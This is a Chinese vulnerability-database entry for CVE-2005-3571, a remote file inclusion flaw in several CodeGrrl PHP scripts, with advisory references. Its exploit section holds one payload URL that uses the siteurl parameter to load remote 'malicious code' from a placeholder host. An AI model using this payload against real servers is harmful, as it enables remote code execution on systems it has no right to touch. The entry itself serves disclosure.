Codegrrl 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109238 漏洞类型 代码注入
发布时间 2005-11-14 更新时间 2007-01-02
CVE编号 CVE-2005-3571 CNNVD-ID CNNVD-200511-182
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/26505
https://cxsecurity.com/issue/WLB-2005110037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200511-182
|漏洞详情
CodeGrrl是一个关注于PHP脚本的网站。CodeGrrl(a)PHPCalendar1.0、(b)PHPClique1.0、(c)PHPCurrently2.0、(d)PHPFanBase2.1和(e)PHPQuotes1.0中的PHP文件包含漏洞,可让远程攻击者在启用register_globals时通过siteurl参数包含任意本地文件。注意:后来有报告称PHPFanBase2.2也受到影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/15417/info

Unspecified Codegrrl applications are prone to a remote arbitrary code execution vulnerability. This is due to a lack of proper sanitization of user-supplied input.

An attacker can exploit this to execute arbitrary code in the context of the Web server process. This may facilitate a compromise of the system; other attacks are also possible. 

http://www.example.com/protection.php?action=logout&siteurl=http://www.example.com/malicoius-code.txt
|参考资料

来源:BID
名称:21664
链接:http://www.securityfocus.com/bid/21664
来源:BID
名称:15417
链接:http://www.securityfocus.com/bid/15417
来源:VUPEN
名称:ADV-2005-2402
链接:http://www.frsirt.com/english/advisories/2005/2402
来源:SECTRACK
名称:1015206
链接:http://securitytracker.com/id?1015206
来源:SECUNIA
名称:17542
链接:http://secunia.com/advisories/17542
来源:BUGTRAQ
名称:20051113PHPCalendar(andsomemorecodegrrl.comproducts)arbitrarycode
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113199214723444&w=2
来源:SREASON
名称:176
链接:http://securityreason.com/securityalert/176